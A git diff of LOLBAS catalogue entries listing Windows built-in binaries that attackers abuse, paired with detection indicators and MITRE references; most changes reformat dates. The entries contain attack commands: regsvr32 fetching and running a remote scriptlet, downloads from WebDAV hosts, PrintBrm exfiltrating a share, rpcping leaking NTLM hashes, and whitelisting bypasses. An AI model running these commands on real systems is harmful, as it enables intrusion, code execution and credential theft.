Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
|
||||||
|
Usecase: Download a file from the Internet without executing any anomalous executables with suspicious arguments
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1105/
|
||||||
|
OperatingSystem: Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: '%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
|
||||||
|
Detection:
|
||||||
|
- IOC: HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL
|
||||||
|
- IOC: Reports of downloading from suspicious URLs in %localappdata%\OneDrive\setup\logs\StandaloneUpdate_*.log files
|
||||||
|
Resources:
|
||||||
|
- Link: https://github.com/LOLBAS-Project/LOLBAS/pull/153
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Elliot Killick
|
||||||
|
Handle: '@elliotkillick'
|
||||||
|
---
|
@ -2,7 +2,7 @@
|
|||||||
Name: Pcalua.exe
|
Name: Pcalua.exe
|
||||||
Description: Program Compatibility Assistant
|
Description: Program Compatibility Assistant
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: pcalua.exe -a calc.exe
|
- Command: pcalua.exe -a calc.exe
|
||||||
Description: Open the target .EXE using the Program Compatibility Assistant.
|
Description: Open the target .EXE using the Program Compatibility Assistant.
|
||||||
@ -30,7 +30,7 @@ Commands:
|
|||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\pcalua.exe
|
- Path: C:\Windows\System32\pcalua.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
@ -41,4 +41,4 @@ Acknowledgement:
|
|||||||
Handle: '@kylehanslovan'
|
Handle: '@kylehanslovan'
|
||||||
- Person: Fab
|
- Person: Fab
|
||||||
Handle: '@0rbz_'
|
Handle: '@0rbz_'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Pcwrun.exe
|
Name: Pcwrun.exe
|
||||||
Description: Program Compatibility Wizard
|
Description: Program Compatibility Wizard
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Pcwrun.exe c:\temp\beacon.exe
|
- Command: Pcwrun.exe c:\temp\beacon.exe
|
||||||
Description: Open the target .EXE file with the Program Compatibility Wizard.
|
Description: Open the target .EXE file with the Program Compatibility Wizard.
|
||||||
@ -14,7 +14,7 @@ Commands:
|
|||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\pcwrun.exe
|
- Path: C:\Windows\System32\pcwrun.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
@ -23,4 +23,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Pierre-Alexandre Braeken
|
- Person: Pierre-Alexandre Braeken
|
||||||
Handle: '@pabraeken'
|
Handle: '@pabraeken'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Pktmon.exe
|
Name: Pktmon.exe
|
||||||
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
|
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
|
||||||
Author: 'Derek Johnson'
|
Author: 'Derek Johnson'
|
||||||
Created: '2020-08-12'
|
Created: 2020-08-12
|
||||||
Commands:
|
Commands:
|
||||||
- Command: pktmon.exe start --etw
|
- Command: pktmon.exe start --etw
|
||||||
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
|
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
|
||||||
@ -23,9 +23,9 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\pktmon.exe
|
- Path: c:\windows\system32\pktmon.exe
|
||||||
- Path: c:\windows\syswow64\pktmon.exe
|
- Path: c:\windows\syswow64\pktmon.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: .etl files found on system
|
- IOC: .etl files found on system
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://binar-x79.com/windows-10-secret-sniffer/
|
- Link: https://binar-x79.com/windows-10-secret-sniffer/
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Presentationhost.exe
|
Name: Presentationhost.exe
|
||||||
Description: File is used for executing Browser applications
|
Description: File is used for executing Browser applications
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Presentationhost.exe C:\temp\Evil.xbap
|
- Command: Presentationhost.exe C:\temp\Evil.xbap
|
||||||
Description: Executes the target XAML Browser Application (XBAP) file
|
Description: Executes the target XAML Browser Application (XBAP) file
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Presentationhost.exe
|
- Path: C:\Windows\System32\Presentationhost.exe
|
||||||
- Path: C:\Windows\SysWOW64\Presentationhost.exe
|
- Path: C:\Windows\SysWOW64\Presentationhost.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
@ -25,4 +25,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Print.exe
|
Name: Print.exe
|
||||||
Description: Used by Windows to send files to the printer
|
Description: Used by Windows to send files to the printer
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
|
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
|
||||||
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
|
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
|
||||||
@ -31,7 +31,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\print.exe
|
- Path: C:\Windows\System32\print.exe
|
||||||
- Path: C:\Windows\SysWOW64\print.exe
|
- Path: C:\Windows\SysWOW64\print.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Print.exe getting files from internet
|
- IOC: Print.exe getting files from internet
|
||||||
@ -42,4 +42,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
32
yml/OSBinaries/PrintBrm.yml
Normal file
32
yml/OSBinaries/PrintBrm.yml
Normal file
@ -0,0 +1,32 @@
|
|||||||
|
---
|
||||||
|
Name: PrintBrm.exe
|
||||||
|
Description: Printer Migration Command-Line Tool
|
||||||
|
Author: 'Elliot Killick'
|
||||||
|
Created: '2021-06-21'
|
||||||
|
Commands:
|
||||||
|
- Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip
|
||||||
|
Description: Create a ZIP file from a folder in a remote drive
|
||||||
|
Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1105/
|
||||||
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
|
||||||
|
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
|
||||||
|
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
|
||||||
|
Category: ADS
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1096
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1096/
|
||||||
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Windows\System32\spool\tools\PrintBrm.exe
|
||||||
|
Detection:
|
||||||
|
- IOC: PrintBrm.exe should not be run on a normal workstation
|
||||||
|
Resources:
|
||||||
|
- Link: https://twitter.com/elliotkillick/status/1404117015447670800
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Elliot Killick
|
||||||
|
Handle: '@elliotkillick'
|
||||||
|
---
|
@ -2,7 +2,7 @@
|
|||||||
Name: Psr.exe
|
Name: Psr.exe
|
||||||
Description: Windows Problem Steps Recorder, used to record screen and clicks.
|
Description: Windows Problem Steps Recorder, used to record screen and clicks.
|
||||||
Author: Leon Rodenko
|
Author: Leon Rodenko
|
||||||
Created: '2020-06-27'
|
Created: 2020-06-27
|
||||||
Commands:
|
Commands:
|
||||||
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
|
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
|
||||||
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
|
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
|
||||||
@ -15,9 +15,9 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\psr.exe
|
- Path: c:\windows\system32\psr.exe
|
||||||
- Path: c:\windows\syswow64\psr.exe
|
- Path: c:\windows\syswow64\psr.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: psr.exe spawned
|
- IOC: psr.exe spawned
|
||||||
- IOC: suspicious activity when running with "/gui 0" flag
|
- IOC: suspicious activity when running with "/gui 0" flag
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -2,9 +2,9 @@
|
|||||||
Name: Rasautou.exe
|
Name: Rasautou.exe
|
||||||
Description: Windows Remote Access Dialer
|
Description: Windows Remote Access Dialer
|
||||||
Author: 'Tony Lambert'
|
Author: 'Tony Lambert'
|
||||||
Created: '2020-01-10'
|
Created: 2020-01-10
|
||||||
Commands:
|
Commands:
|
||||||
- Command: rasautou -d powershell.dll -p powershell -a a -e e
|
- Command: rasautou -d powershell.dll -p powershell -a a -e e
|
||||||
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
|
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
|
||||||
Usecase: Execute DLL code
|
Usecase: Execute DLL code
|
||||||
Category: Execute
|
Category: Execute
|
||||||
@ -14,7 +14,7 @@ Commands:
|
|||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\rasautou.exe
|
- Path: C:\Windows\System32\rasautou.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: rasautou.exe command line containing -d and -p
|
- IOC: rasautou.exe command line containing -d and -p
|
||||||
@ -24,4 +24,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: FireEye
|
- Person: FireEye
|
||||||
Handle: '@FireEye'
|
Handle: '@FireEye'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Reg.exe
|
Name: Reg.exe
|
||||||
Description: Used to manipulate the registry
|
Description: Used to manipulate the registry
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
|
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
|
||||||
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
|
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\reg.exe
|
- Path: C:\Windows\System32\reg.exe
|
||||||
- Path: C:\Windows\SysWOW64\reg.exe
|
- Path: C:\Windows\SysWOW64\reg.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: reg.exe writing to an ADS
|
- IOC: reg.exe writing to an ADS
|
||||||
@ -24,4 +24,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,9 +2,9 @@
|
|||||||
Name: Regasm.exe
|
Name: Regasm.exe
|
||||||
Description: Part of .NET
|
Description: Part of .NET
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: regasm.exe AllTheThingsx64.dll
|
- Command: regasm.exe AllTheThingsx64.dll
|
||||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||||
Usecase: Execute code and bypass Application whitelisting
|
Usecase: Execute code and bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL bypass
|
||||||
@ -12,7 +12,7 @@ Commands:
|
|||||||
MitreID: T1121
|
MitreID: T1121
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: regasm.exe /U AllTheThingsx64.dll
|
- Command: regasm.exe /U AllTheThingsx64.dll
|
||||||
Description: Loads the target .DLL file and executes the UnRegisterClass function.
|
Description: Loads the target .DLL file and executes the UnRegisterClass function.
|
||||||
Usecase: Execute code and bypass Application whitelisting
|
Usecase: Execute code and bypass Application whitelisting
|
||||||
Category: Execute
|
Category: Execute
|
||||||
@ -25,7 +25,7 @@ Full_Path:
|
|||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: regasm.exe executing dll file
|
- IOC: regasm.exe executing dll file
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Regedit.exe
|
Name: Regedit.exe
|
||||||
Description: Used by Windows to manipulate registry
|
Description: Used by Windows to manipulate registry
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
|
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
|
||||||
Description: Export the target Registry key to the specified .REG file.
|
Description: Export the target Registry key to the specified .REG file.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\regedit.exe
|
- Path: C:\Windows\System32\regedit.exe
|
||||||
- Path: C:\Windows\SysWOW64\regedit.exe
|
- Path: C:\Windows\SysWOW64\regedit.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: regedit.exe reading and writing to alternate data stream
|
- IOC: regedit.exe reading and writing to alternate data stream
|
||||||
@ -33,4 +33,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Regini.exe
|
Name: Regini.exe
|
||||||
Description: Used to manipulate the registry
|
Description: Used to manipulate the registry
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2020-07-03'
|
Created: 2020-07-03
|
||||||
Commands:
|
Commands:
|
||||||
- Command: regini.exe newfile.txt:hidden.ini
|
- Command: regini.exe newfile.txt:hidden.ini
|
||||||
Description: Write registry keys from data inside the Alternate data stream.
|
Description: Write registry keys from data inside the Alternate data stream.
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\regini.exe
|
- Path: C:\Windows\System32\regini.exe
|
||||||
- Path: C:\Windows\SysWOW64\regini.exe
|
- Path: C:\Windows\SysWOW64\regini.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: regini.exe reading from ADS
|
- IOC: regini.exe reading from ADS
|
||||||
@ -24,4 +24,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Eli Salem
|
- Person: Eli Salem
|
||||||
Handle: '@elisalem9'
|
Handle: '@elisalem9'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Register-cimprovider.exe
|
Name: Register-cimprovider.exe
|
||||||
Description: Used to register new wmi providers
|
Description: Used to register new wmi providers
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Register-cimprovider -path "C:\folder\evil.dll"
|
- Command: Register-cimprovider -path "C:\folder\evil.dll"
|
||||||
Description: Load the target .DLL.
|
Description: Load the target .DLL.
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Register-cimprovider.exe
|
- Path: C:\Windows\System32\Register-cimprovider.exe
|
||||||
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
|
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
@ -24,4 +24,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Philip Tsukerman
|
- Person: Philip Tsukerman
|
||||||
Handle: '@PhilipTsukerman'
|
Handle: '@PhilipTsukerman'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Regsvcs.exe
|
Name: Regsvcs.exe
|
||||||
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
|
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\regsvcs.exe
|
- Path: C:\Windows\System32\regsvcs.exe
|
||||||
- Path: C:\Windows\SysWOW64\regsvcs.exe
|
- Path: C:\Windows\SysWOW64\regsvcs.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Regsvr32.exe
|
Name: Regsvr32.exe
|
||||||
Description: Used by Windows to register dlls
|
Description: Used by Windows to register dlls
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||||
@ -39,7 +39,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\regsvr32.exe
|
- Path: C:\Windows\System32\regsvr32.exe
|
||||||
- Path: C:\Windows\SysWOW64\regsvr32.exe
|
- Path: C:\Windows\SysWOW64\regsvr32.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: regsvr32.exe getting files from Internet
|
- IOC: regsvr32.exe getting files from Internet
|
||||||
@ -51,4 +51,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
---
|
||||||
|
@ -1,12 +1,12 @@
|
|||||||
---
|
---
|
||||||
Name: Replace.exe
|
Name: Replace.exe
|
||||||
Description: Used to replace file with another file
|
Description: Used to replace file with another file
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: replace.exe C:\Source\File.cab C:\Destination /A
|
- Command: replace.exe C:\Source\File.cab C:\Destination /A
|
||||||
Description: Copy file.cab to destination
|
Description: Copy file.cab to destination
|
||||||
Usecase: Copy files
|
Usecase: Copy files
|
||||||
Category: Copy
|
Category: Copy
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
@ -14,7 +14,7 @@ Commands:
|
|||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
|
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
|
||||||
Description: Download/Copy bar.exe to outdir
|
Description: Download/Copy bar.exe to outdir
|
||||||
Usecase: Download file
|
Usecase: Download file
|
||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\replace.exe
|
- Path: C:\Windows\System32\replace.exe
|
||||||
- Path: C:\Windows\SysWOW64\replace.exe
|
- Path: C:\Windows\SysWOW64\replace.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Replace.exe getting files from remote server
|
- IOC: Replace.exe getting files from remote server
|
||||||
@ -33,4 +33,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: elceef
|
- Person: elceef
|
||||||
Handle: '@elceef'
|
Handle: '@elceef'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Rpcping.exe
|
Name: Rpcping.exe
|
||||||
Description: Used to verify rpc connection
|
Description: Used to verify rpc connection
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
|
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
|
||||||
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
|
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\rpcping.exe
|
- Path: C:\Windows\System32\rpcping.exe
|
||||||
- Path: C:\Windows\SysWOW64\rpcping.exe
|
- Path: C:\Windows\SysWOW64\rpcping.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Rundll32.exe
|
Name: Rundll32.exe
|
||||||
Description: Used by Windows to execute dll files
|
Description: Used by Windows to execute dll files
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: rundll32.exe AllTheThingsx64,EntryPoint
|
- Command: rundll32.exe AllTheThingsx64,EntryPoint
|
||||||
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
|
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
|
||||||
@ -65,13 +65,13 @@ Commands:
|
|||||||
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
|
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID:
|
MitreID:
|
||||||
MitreLink:
|
MitreLink:
|
||||||
OperatingSystem: Windows 10 (and likely previous versions)
|
OperatingSystem: Windows 10 (and likely previous versions)
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\rundll32.exe
|
- Path: C:\Windows\System32\rundll32.exe
|
||||||
- Path: C:\Windows\SysWOW64\rundll32.exe
|
- Path: C:\Windows\SysWOW64\rundll32.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Runonce.exe
|
Name: Runonce.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Runonce.exe /AlternateShellStartup
|
- Command: Runonce.exe /AlternateShellStartup
|
||||||
Description: Executes a Run Once Task that has been configured in the registry
|
Description: Executes a Run Once Task that has been configured in the registry
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\runonce.exe
|
- Path: C:\Windows\System32\runonce.exe
|
||||||
- Path: C:\Windows\SysWOW64\runonce.exe
|
- Path: C:\Windows\SysWOW64\runonce.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
|
